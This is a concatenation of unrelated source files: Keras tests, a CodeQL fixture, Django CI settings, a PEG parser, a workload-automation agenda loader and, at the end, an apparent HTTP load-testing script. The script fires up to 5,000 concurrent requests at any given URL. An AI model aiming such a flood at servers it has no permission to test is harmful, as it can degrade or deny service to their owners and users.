model.fit([x1, x2], [y1, y2], epochs=2, steps_per_epoch=10, verbose=0)
_ = model.evaluate(steps=10, verbose=0)
def test_multi_io_workflow_with_numpy_arrays_and_custom_placeholders(self):
num_classes = (2, 3)
num_samples = 1000
input_dim = 50
with self.test_session():
model = MultiIOTestModel(num_classes=num_classes,
use_dp=True,
use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
x2_placeholder = array_ops.placeholder(
dtype='float32', shape=(None, input_dim))
model._set_inputs([x1, x2_placeholder])
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
_ = model.evaluate([x1, x2], [y1, y2], verbose=0)
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_attributes(self):
# layers, weights, trainable_weights, non_trainable_weights, inputs, outputs
num_classes = (2, 3)
num_samples = 100
input_dim = 50
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
self.assertEqual(model.name, 'test_model')
self.assertEqual(model.built, False)
self.assertEqual(len(model.weights), 0)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
self.assertEqual(model.built, True)
self.assertEqual(len(model.layers), 4)
self.assertEqual(len(model.weights), 10)
self.assertEqual(len(model.trainable_weights), 8)
self.assertEqual(len(model.non_trainable_weights), 2)
self.assertEqual(len(model.inputs), 2)
self.assertEqual(len(model.outputs), 2)
@test_util.run_in_graph_and_eager_modes()
def test_updates(self):
# test that updates get run during training
num_samples = 100
input_dim = 50
class BNNet(keras.Model):
def __init__(self):
super(BNNet, self).__init__()
self.bn = keras.layers.BatchNormalization(beta_initializer='ones',
gamma_initializer='ones')
def call(self, inputs):
return self.bn(inputs)
x = np.ones((num_samples, input_dim))
y = np.ones((num_samples, input_dim))
model = BNNet()
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
y_ref = model.predict(x)
model.train_on_batch(x, y)
y_new = model.predict(x)
self.assertGreater(np.sum(np.abs(y_ref - y_new)), 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_and_inference_behavior(self):
# test that dropout is applied in training and not inference
num_samples = 100
input_dim = 50
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs):
x = self.dp(inputs)
return self.dense(x)
model = DPNet()
x = np.ones((num_samples, input_dim))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
@test_util.run_in_graph_and_eager_modes()
def test_training_methods(self):
# test fit, train_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
model.fit({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2},
epochs=2, batch_size=32)
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0,
validation_data=([x1, x2], [y1, y2]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.train_on_batch([x1, x2], [y1, y2])
model.train_on_batch({'input_1': x1, 'input_2': x2},
{'output_1': y1, 'output_2': y2})
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True)
def test_inference_methods(self):
# test predict, evaluate, test_on_batch, predict_on_batch
# on different input types: list, dict
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.evaluate([x1, x2], [y1, y2])
model.test_on_batch([x1, x2], [y1, y2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict([x1, x2])
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.predict_on_batch([x1, x2])
@test_util.run_in_graph_and_eager_modes()
def test_trainable_mutation(self):
# test that you can change `trainable` on a model or layer, and that
# it freezes the model state during training
# TODO(fchollet): add test after we unify BN behavior in eager and symbolic.
pass
@test_util.run_in_graph_and_eager_modes()
def test_saving(self):
if h5py is None:
return # Skip test if models cannot be saved.
num_classes = (2, 3)
num_samples = 100
input_dim = 50
x1 = np.ones((num_samples, input_dim))
x2 = np.ones((num_samples, input_dim))
y1 = np.zeros((num_samples, num_classes[0]))
y2 = np.zeros((num_samples, num_classes[1]))
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
model.fit([x1, x2], [y1, y2], epochs=2, batch_size=32, verbose=0)
y_ref_1, y_ref_2 = model.predict([x1, x2])
fd, fname = tempfile.mkstemp('.h5')
model.save_weights(fname)
model = MultiIOTestModel(num_classes=num_classes, use_bn=True)
# need to build the model before loading weights
# (otherwise no weights to load)
model._set_inputs([x1, x2])
model.load_weights(fname)
y1, y2 = model.predict([x1, x2])
self.assertAllClose(y_ref_1, y1, atol=1e-5)
self.assertAllClose(y_ref_2, y2, atol=1e-5)
os.close(fd)
os.remove(fname)
@test_util.run_in_graph_and_eager_modes()
def test_summary(self):
class ToString(object):
def __init__(self):
self.contents = ''
def __call__(self, msg):
self.contents += msg + '\n'
# Single-io
model = SimpleTestModel(num_classes=4, use_bn=True, use_dp=True)
model._set_inputs(np.ones((3, 4))) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 356' in print_fn.contents)
# Multi-io
model = MultiIOTestModel(num_classes=(5, 6), use_bn=True, use_dp=True)
model._set_inputs([np.ones((3, 4)),
np.ones((3, 4))]) # need to build model first
print_fn = ToString()
model.summary(print_fn=print_fn)
self.assertTrue('Trainable params: 587' in print_fn.contents)
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = NestedTestModel1(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_graph_nested_in_subclass(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = NestedTestModel2(num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 8 + len(model.test_net.weights))
self.assertEqual(len(model.non_trainable_weights),
2 + len(model.test_net.non_trainable_weights))
self.assertEqual(len(model.trainable_weights),
6 + len(model.test_net.trainable_weights))
@test_util.run_in_graph_and_eager_modes()
def test_subclass_nested_in_graph(self):
num_classes = 2
num_samples = 100
input_dim = 50
model = get_nested_model_3(input_dim=input_dim, num_classes=num_classes)
model.compile(loss='mse',
optimizer=RMSPropOptimizer(learning_rate=0.001),
metrics=['acc'])
x = np.ones((num_samples, input_dim))
y = np.zeros((num_samples, num_classes))
model.fit(x, y, epochs=2, batch_size=32, verbose=0)
_ = model.evaluate(x, y, verbose=0)
self.assertEqual(len(model.weights), 16)
self.assertEqual(
len(model.non_trainable_weights), 4)
self.assertEqual(len(model.trainable_weights), 12)
@test_util.run_in_graph_and_eager_modes()
def test_support_for_manual_training_arg(self):
# In most cases, the `training` argument is left unspecified, in which
# case it defaults to value corresponding to the Model method being used
# (fit -> True, predict -> False, etc).
# If the user writes their model `call` method to take
# an explicit `training` argument, we must check that the correct value
# is being passed to the model for each method call.
class DPNet(keras.Model):
def __init__(self):
super(DPNet, self).__init__()
self.dp = keras.layers.Dropout(0.5)
self.dense = keras.layers.Dense(1,
use_bias=False,
kernel_initializer='ones')
def call(self, inputs, training=False):
x = self.dp(inputs, training=training)
return self.dense(x)
model = DPNet()
x = np.ones((10, 10))
y = model.predict(x)
self.assertEqual(np.sum(y), np.sum(x))
model.compile(loss='mse', optimizer=RMSPropOptimizer(learning_rate=0.001))
loss = model.train_on_batch(x, y)
self.assertGreater(loss, 0.1)
if __name__ == '__main__':
test.main()
| Xeralux/tensorflow | tensorflow/python/keras/_impl/keras/model_subclassing_test.py | Python | apache-2.0 | 19,733 |
from __future__ import unicode_literals
import sys
class C(object):
x = 'C_x'
def __init__(self):
self.y = 'c_y'
class D(C):
pass
if len(sys.argv) > 2:
v1 = C
else:
v1 = D
v2 = v1()
def f():
if len(sys.argv) > 3:
v3 = C()
else:
v3 = D()
return v3
def g(arg):
return arg
class X(object):
@classmethod
def method1(cls):
pass
@deco
def method2(self):
pass
v4 = g(f())
def deco(f):
return f
class Y(object):
@deco
def method2(self):
pass
v1
v2
v3
v4
list
def h(args):
if len(sys.argv) > 4:
v5 = C()
else:
v5 = D()
return v5, list(args)
def j():
return tuple, dict
dict
dict = 7
dict
tuple = tuple
tuple
from abc import abstractmethod
abstractmethod
from module import unknown
unknown
#Value of variables in inner functions
def outer():
y = 1
def inner(x):
return x + y + z + unknown + list
z = 2;
return inner
def outer_use_vars(x):
y = 1
def inner():
return x + y + z + unknown + list
z = 2;
y + z
return inner
y = lambda x : following()
def following():
pass
def params_and_defaults(a, b={}, c = 1):
a
b
c
def inner_cls():
class A(BaseException):
pass
a = A()
raise a
z
def multiple_assignment():
_tuple, _list = tuple, list
_tuple
_list
def vararg_kwarg(*t, **d):
t
d
class E(object):
def _internal(arg):
# arg is not a C
def wrapper(args):
return arg(args)
return wrapper
@_internal
def method(self, *args):
pass
x = 1
x
#Global in class scope
class F(object):
x = x
x
| github/codeql | python/ql/test/library-tests/PointsTo/lookup/test.py | Python | mit | 1,725 |
# pylint: skip-file
"""
Settings.py for testing on Circle CI.
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'foobar' # nosec
DEBUG = False
ADMINS = [('Chris Karr', 'chris@audacious-software.com')]
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.gis',
'passive_data_kit'
)
MIDDLEWARE = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'passive_data_kit.circle_urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pdk.wsgi.application'
DATABASES = {
'default': {
'ENGINE': 'django.contrib.gis.db.backends.postgis',
'NAME': 'circle_test',
'USER': 'root',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
# if 'test' in sys.argv or 'test_coverage' in sys.argv: #Covers regular testing and django-coverage
# DATABASES['default']['ENGINE'] = 'django.contrib.gis.db.backends.spatialite'
# SPATIALITE_LIBRARY_PATH = 'mod_spatialite'
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = 'static'
| audaciouscode/PassiveDataKit-Django | circle_settings.py | Python | apache-2.0 | 2,489 |
'''
Runs tests against exceptions defined in ``exception.py``
'''
import unittest
from sqlstr import exception
class Test_Exceptions(unittest.TestCase):
'''Test suite for sqlstr.exception'''
def test_sqlstrException(self):
'''Test the base exception sqlstr.exception.sqlstrException'''
test_exception = exception.sqlstrException("some exception")
self.assertIsInstance(test_exception, Exception,
"exception.sqlstrException is not a sub-class of Exception")
| GochoMugo/sql-string-templating | test/test_exception.py | Python | mit | 505 |
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="value",
parent_name="layout.scene.xaxis.tickformatstop",
**kwargs
):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
**kwargs
)
| plotly/plotly.py | packages/python/plotly/plotly/validators/layout/scene/xaxis/tickformatstop/_value.py | Python | mit | 454 |
from . import rd_parser as rd
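# Informal sketch of the grammar these combinators accept (derived from the
# rule functions below, not from separate documentation): a file is
#   GRAMMAR <start_rule_name>
#   rule_name -> expression ;
#   ...
# where an expression is a whitespace-separated sequence, a "/"-separated
# ordered choice, or a sub-expression: a "(...)" group, a "!"/"&" predicate,
# a "*"/"+"/"?" repetition suffix, a "string" literal, a [...] character
# class, ".", a rule call, or EOF.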
def peg():
return rd.action('peg', rd.sequence([
rd.zero_or_more(_()),
parsing_header(),
rd.one_or_more(_()),
parsing_body(),
rd.end_of_file()
]))
def parsing_header():
return rd.action('noop', rd.sequence([
rd.string('GRAMMAR'),
rd.one_or_more(_()),
rd.one_or_more(parsing_rule_name())
]))
def parsing_body():
return rd.action('parsing_body', rd.one_or_more(rd.ordered_choice([
parsing_rule(),
rd.one_or_more(_())
])))
def parsing_rule():
return rd.action('parsing_rule', rd.sequence([
parsing_rule_name(),
rd.zero_or_more(_()),
rd.string('->'),
rd.zero_or_more(_()),
parsing_expression(),
rd.zero_or_more(_()),
rd.string(';'),
rd.zero_or_more(_())
]))
def parsing_rule_name():
return rd.action('noop', rd.sequence([
rd.regex_char('[a-zA-Z]'),
rd.zero_or_more(rd.regex_char('[a-zA-Z_]')),
]))
def parsing_expression():
return rd.action('parsing_expression', rd.ordered_choice([
parsing_sequence(),
parsing_ordered_choice(),
parsing_sub_expression()
]))
def parsing_sequence():
return rd.action('parsing_sequence', rd.sequence([
rd.ordered_choice([
parsing_ordered_choice(),
parsing_sub_expression()
]),
rd.one_or_more(rd.sequence([
rd.one_or_more(_()),
rd.ordered_choice([
parsing_ordered_choice(),
parsing_sub_expression()
])
]))
]))
def parsing_ordered_choice():
return rd.action('parsing_ordered_choice', rd.sequence([
parsing_sub_expression(),
rd.one_or_more(rd.sequence([
rd.zero_or_more(_()),
rd.string('/'),
rd.zero_or_more(_()),
parsing_sub_expression(),
]))
]))
def parsing_sub_expression():
return rd.action('parsing_sub_expression', rd.ordered_choice([
parsing_not_predicate(),
parsing_and_predicate(),
parsing_optional(),
parsing_one_or_more(),
parsing_zero_or_more(),
parsing_group(),
parsing_atomic_expression()
]))
def parsing_group():
return rd.action('parsing_group', rd.sequence([
rd.string('('),
rd.zero_or_more(_()),
rd.rec(parsing_expression),
rd.zero_or_more(_()),
rd.string(')')
]))
def parsing_atomic_expression():
return rd.action('parsing_atomic_expression', rd.ordered_choice([
parsing_string(),
parsing_regex_char(),
parsing_eof(),
parsing_rule_call()
]))
def parsing_not_predicate():
return rd.action('parsing_not_predicate', rd.sequence([
rd.string('!'),
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
])
]))
def parsing_and_predicate():
return rd.action('parsing_and_predicate', rd.sequence([
rd.string('&'),
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
])
]))
def parsing_zero_or_more():
return rd.action('parsing_zero_or_more', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('*')
]))
def parsing_one_or_more():
return rd.action('parsing_one_or_more', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('+')
]))
def parsing_optional():
return rd.action('parsing_optional', rd.sequence([
rd.ordered_choice([
parsing_group(),
parsing_atomic_expression()
]),
rd.string('?')
]))
def parsing_rule_call():
return rd.action('parsing_rule_call', parsing_rule_name())
def parsing_string():
return rd.action('parsing_string', rd.sequence([
rd.string('"'),
rd.one_or_more(rd.ordered_choice([
rd.string('\\"'),
rd.regex_char('[^"]'),
])),
rd.string('"')
]))
def parsing_regex_char():
return rd.action('parsing_regex_char', rd.ordered_choice([
rd.sequence([
rd.string('['),
rd.optional(rd.string('^')),
rd.one_or_more(rd.ordered_choice([
rd.string('\\]'),
rd.string('\\['),
rd.regex_char('[^\\]]'),
])),
rd.string(']')
]),
rd.string('.')
]))
def parsing_eof():
return rd.action('parsing_end_of_file', rd.string("EOF"))
def _():
return rd.action('noop', rd.regex_char('[\\s]'))
class SimplePegParser(object):
"""Class that allows you to parse PEG grammaras (EBNF-ish style)"""
parser = None
state = None
def __init__(self):
self.parser = peg()
def parse(self, text):
self.state = rd.State(
text=text,
position=0
)
ast = self.parser(self.state)
return ast
def get_last_expectations(self):
return self.state.last_expectations
def get_last_error(self):
return rd.get_last_error(self.state)
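    # Illustrative usage (the grammar text is a made-up example):
    #   parser = SimplePegParser()
    #   ast = parser.parse('GRAMMAR greeting\n greeting -> "hello";')
    #   # on failure, get_last_error() describes what was expected and where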
| SimplePEG/Python | simplepeg/speg_parser.py | Python | mit | 5,310 |
# Copyright 2015 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from copy import copy
from collections import OrderedDict, defaultdict
from wlauto.exceptions import ConfigError
from wlauto.utils.misc import load_struct_from_yaml, LoadSyntaxError
from wlauto.utils.types import counter, reset_counter
import yaml
def get_aliased_param(d, aliases, default=None, pop=True):
alias_map = [i for i, a in enumerate(aliases) if a in d]
if len(alias_map) > 1:
message = 'Only one of {} may be specified in a single entry'
raise ConfigError(message.format(aliases))
elif alias_map:
if pop:
return d.pop(aliases[alias_map[0]])
else:
return d[aliases[alias_map[0]]]
else:
return default
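# e.g. get_aliased_param({'params': {'x': 1}},
#                        ['workload_parameters', 'workload_params', 'params'])
# returns {'x': 1} (popping the key from the dict); specifying more than one
# of the aliases in the same entry raises ConfigError.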
class AgendaEntry(object):
def to_dict(self):
return copy(self.__dict__)
class AgendaWorkloadEntry(AgendaEntry):
"""
Specifies execution of a workload, including things like the number of
iterations, device runtime_parameters configuration, etc.
"""
def __init__(self, **kwargs):
super(AgendaWorkloadEntry, self).__init__()
self.id = kwargs.pop('id')
self.workload_name = get_aliased_param(kwargs, ['workload_name', 'name'])
if not self.workload_name:
raise ConfigError('No workload name specified in entry {}'.format(self.id))
self.label = kwargs.pop('label', self.workload_name)
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params', 'params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
if kwargs:
raise ConfigError('Invalid entry(ies) in workload {}: {}'.format(self.id, ', '.join(kwargs.keys())))
class AgendaSectionEntry(AgendaEntry):
"""
    Specifies a section of the agenda: configuration (iterations, boot/runtime/
    workload parameters, instrumentation, flash settings) shared by the
    workloads grouped under the section.
"""
def __init__(self, agenda, **kwargs):
super(AgendaSectionEntry, self).__init__()
self.id = kwargs.pop('id')
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
self.workloads = []
for w in kwargs.pop('workloads', []):
self.workloads.append(agenda.get_workload_entry(w))
if kwargs:
raise ConfigError('Invalid entry(ies) in section {}: {}'.format(self.id, ', '.join(kwargs.keys())))
def to_dict(self):
d = copy(self.__dict__)
d['workloads'] = [w.to_dict() for w in self.workloads]
return d
class AgendaGlobalEntry(AgendaEntry):
"""
Workload configuration global to all workloads.
"""
def __init__(self, **kwargs):
super(AgendaGlobalEntry, self).__init__()
self.number_of_iterations = kwargs.pop('iterations', None)
self.boot_parameters = get_aliased_param(kwargs,
['boot_parameters', 'boot_params'],
default=OrderedDict())
self.runtime_parameters = get_aliased_param(kwargs,
['runtime_parameters', 'runtime_params', 'params'],
default=OrderedDict())
self.workload_parameters = get_aliased_param(kwargs,
['workload_parameters', 'workload_params'],
default=OrderedDict())
self.instrumentation = kwargs.pop('instrumentation', [])
self.flash = kwargs.pop('flash', OrderedDict())
if kwargs:
raise ConfigError('Invalid entries in global section: {}'.format(kwargs))
class Agenda(object):
def __init__(self, source=None):
self.filepath = None
self.config = None
self.global_ = None
self.sections = []
self.workloads = []
self._seen_ids = defaultdict(set)
if source:
try:
reset_counter('section')
reset_counter('workload')
self._load(source)
            except (ConfigError, LoadSyntaxError, SyntaxError) as e:
raise ConfigError(str(e))
def add_workload_entry(self, w):
entry = self.get_workload_entry(w)
self.workloads.append(entry)
def get_workload_entry(self, w):
if isinstance(w, basestring):
w = {'name': w}
if not isinstance(w, dict):
raise ConfigError('Invalid workload entry: "{}" in {}'.format(w, self.filepath))
self._assign_id_if_needed(w, 'workload')
return AgendaWorkloadEntry(**w)
def _load(self, source):
raw = self._load_raw_from_source(source)
if not isinstance(raw, dict):
message = '{} does not contain a valid agenda structure; top level must be a dict.'
raise ConfigError(message.format(self.filepath))
for k, v in raw.iteritems():
if k == 'config':
self.config = v
elif k == 'global':
self.global_ = AgendaGlobalEntry(**v)
elif k == 'sections':
self._collect_existing_ids(v, 'section')
for s in v:
if not isinstance(s, dict):
raise ConfigError('Invalid section entry: "{}" in {}'.format(s, self.filepath))
self._collect_existing_ids(s.get('workloads', []), 'workload')
for s in v:
self._assign_id_if_needed(s, 'section')
self.sections.append(AgendaSectionEntry(self, **s))
elif k == 'workloads':
self._collect_existing_ids(v, 'workload')
for w in v:
self.workloads.append(self.get_workload_entry(w))
else:
raise ConfigError('Unexpected agenda entry "{}" in {}'.format(k, self.filepath))
def _load_raw_from_source(self, source):
if hasattr(source, 'read') and hasattr(source, 'name'): # file-like object
self.filepath = source.name
raw = load_struct_from_yaml(text=source.read())
elif isinstance(source, basestring):
if os.path.isfile(source):
self.filepath = source
raw = load_struct_from_yaml(filepath=self.filepath)
else: # assume YAML text
raw = load_struct_from_yaml(text=source)
else:
raise ConfigError('Unknown agenda source: {}'.format(source))
return raw
def _collect_existing_ids(self, ds, pool):
# Collection needs to take place first so that auto IDs can be
# correctly assigned, e.g. if someone explicitly specified an ID
# of '1' for one of the workloads.
for d in ds:
if isinstance(d, dict) and 'id' in d:
did = str(d['id'])
if did in self._seen_ids[pool]:
raise ConfigError('Duplicate {} ID: {}'.format(pool, did))
self._seen_ids[pool].add(did)
def _assign_id_if_needed(self, d, pool):
# Also enforces string IDs
if d.get('id') is None:
did = str(counter(pool))
while did in self._seen_ids[pool]:
did = str(counter(pool))
d['id'] = did
self._seen_ids[pool].add(did)
else:
d['id'] = str(d['id'])
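# Illustrative usage (the file name is a placeholder; the source may equally
# be a YAML string or an open file object):
#   agenda = Agenda('my_agenda.yaml')
#   for workload in agenda.workloads:
#       print workload.id, workload.workload_name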
# Modifying the yaml parser to use an OrderedDict, rather than a regular Python
# dict, for mappings. This preserves the order in which the items are
# specified. See
# http://stackoverflow.com/a/21048064
_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG
def dict_representer(dumper, data):
return dumper.represent_mapping(_mapping_tag, data.iteritems())
def dict_constructor(loader, node):
return OrderedDict(loader.construct_pairs(node))
yaml.add_representer(OrderedDict, dict_representer)
yaml.add_constructor(_mapping_tag, dict_constructor)
| rockyzhang/workload-automation | wlauto/core/agenda.py | Python | apache-2.0 | 10,036 |
#!/usr/bin/python3
from queue import Queue
from queue import Empty
import time
import threading
import sys
import requests
import click
from requests.exceptions import ReadTimeout
from socket import error as socket_error
import logging
logging.basicConfig(filename='log.log', level=logging.INFO)
# Tests are loaded as (hits, workers) tuples.
tests = [
(50, 50,),
(100, 100,),
(200, 200,),
(400, 400,),
(600, 600,),
(800, 800,),
(1000, 1000,),
(1500, 1500,),
(2000, 2000,),
(3000, 2000,),
(5000, 2000,)
]
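# Each (hits, workers) stage fires `hits` requests across `workers` threads;
# main() only advances to the next, larger stage if the current one passes
# within the error tolerance.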
def print_logo():
print('''\033[1;32m
_ _ _____
| | | | |____ |
| |_ ___ | | ___ _ __ __ _ _ __ ___ ___ / /
| __| / _ \ | | / _ \| '__| / _` || '_ \ / __| / _ \ \ \\
| |_ | (_) || || __/| | | (_| || | | || (__ | __/.___/ /
\__| \___/ |_| \___||_| \__,_||_| |_| \___| \___|\____/\033[m''')
def process_report(report, error_tolerance):
total_non_200 = 0
total_ms = 0
total_not_present = 0
result_codes = {'Timeouts': 0, 'Connection Errors': 0}
for r in report:
status_code = r.get('status_code')
total_ms += r.get('ms')
if status_code:
if status_code not in result_codes:
result_codes[status_code] = 0
result_codes[status_code] += 1
if status_code != 200:
total_non_200 += 1
if r.get('expect_not_present'):
total_not_present += 1
else:
total_non_200 += 1
if r.get('timeout'):
result_codes['Timeouts'] += 1
if r.get('connection_error'):
result_codes['Connection Errors'] += 1
if total_non_200 <= error_tolerance and total_not_present < error_tolerance:
test_passed = True
else:
test_passed = False
total_time = report[-1].get('tstop') - report[0].get('tstart')
total_success = len(report)-total_non_200
out = "%s success, %s failed, %.2f RPS, %.2fs ART, %.2fs Total" % \
(total_success, total_non_200, total_success/total_time, total_ms/1000/len(report), total_time)
if not test_passed:
out += '\n' + str(result_codes) + ' Not Present: ' + str(total_not_present)
return test_passed, out
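# Illustrative summary line produced above (hypothetical numbers):
#   "48 success, 2 failed, 115.21 RPS, 0.09s ART, 0.42s Total"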
def do_work(job):
tstart = time.perf_counter()
status_code = None
timeout = False
connection_error = False
expect_not_present = False
try:
result = requests.get(job.get('url'), timeout=job.get('timeout'))
status_code = result.status_code
if job.get('expect'):
if job.get('expect') not in result.text:
expect_not_present = True
except ReadTimeout:
timeout = True
except socket_error:
connection_error = True
return {'status_code': status_code, 'ms': (time.perf_counter()-tstart)*1000, 'timeout': timeout,
'connection_error': connection_error,
'tstart': tstart, 'tstop': time.perf_counter(), 'expect_not_present': expect_not_present}
def worker():
while True:
try:
job = q.get(True, 2)
except Empty:
break
result = do_work(job)
job.get('report').append(result)
q.task_done()
q = Queue()
@click.command()
@click.option('--url', prompt="URL to request", help='The URL to run the test on.')
@click.option('--timeout', default=10, help='Timeout in seconds before moving on.')
@click.option('--tolerance', default=5, help='How many errors will we tolerate?')
@click.option('--expect', default=None, help='Only consider a request valid if it sees this value in the response.')
def main(url, timeout, tolerance, expect):
print_logo()
print()
print("URL: %s" % url)
print("Timeout: %s Tolerance: %s" % (timeout, tolerance))
if expect:
print('Expecting: "%s"' % expect)
print()
print('RPS: Requests Per Second. (only counts successful requests)')
print('ART: Average Request Time. (includes timeouts etc)')
print()
for test in tests:
hits = test[0]
workers = test[1]
thread_stopper_start = time.perf_counter()
while threading.active_count() > 1:
time.sleep(0.1)
if time.perf_counter() - thread_stopper_start > 30:
print('Timed out while waiting for threads to spin down... Waited 30 seconds and still had %s '
'threads.' % str(threading.active_count()-1))
sys.exit(1)
print('%s hits with %s workers' % (hits, workers))
report = []
for i in range(workers):
try:
t = threading.Thread(target=worker)
t.daemon = True
t.start()
except RuntimeError:
print('Unable to create threads. What OS is this?')
sys.exit(1)
for item in range(hits):
q.put({'url': url, 'timeout': timeout, 'report': report, 'expect': expect})
q.join() # block until all tasks are done
logging.info(report)
test_passed, summary = process_report(report, tolerance)
if test_passed:
print('\033[1;32mPassed: ', end='')
else:
print('\033[1;31mFailed: ', end='')
